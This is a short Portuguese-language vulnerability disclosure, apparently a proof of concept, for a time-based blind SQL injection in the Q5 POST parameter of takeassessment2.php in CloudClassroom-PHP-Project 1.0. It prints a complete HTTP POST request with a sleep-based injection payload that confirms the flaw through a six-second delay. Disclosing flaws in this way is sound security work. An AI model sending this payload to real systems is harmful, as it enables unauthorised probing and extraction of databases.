
Prova de conceito para uma vulnerabilidade de injeção SQL cega baseada em tempo no endpoint takeassessment2.php do CloudClassroom-PHP-Project 1.0, demonstrando exploração remota através de uma requisição POST manipulada.
Existe uma vulnerabilidade de injeção SQL no endpoint takeassessment2.php do CloudClassroom-PHP-Project 1.0, onde o parâmetro POST Q5 é incorporado diretamente em instruções SQL sem sanitização.
Tipo de Vulnerabilidade :
SQL Injection
Fornecedor do Produto :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
Base de Código do Produto Afetado :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
Componente Afetado :
takeassessment2.php, parâmetro POST Q5, lógica de consulta SQL
Vetores de Ataque :
Para explorar esta vulnerabilidade, um invasor envia uma requisição POST maliciosa para /CloudClassroom-PHP-Project-master/takeassessment2.php com um payload no parâmetro Q5 que causa um atraso temporal no processamento SQL (SQLi cego baseado em tempo).
Requisição POST:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Isto causa um atraso de 6 segundos na resposta, confirmando a vulnerabilidade.
Referência :
https://owasp.org/www-community/attacks/SQL_Injection
Descobridor : saurabh solanki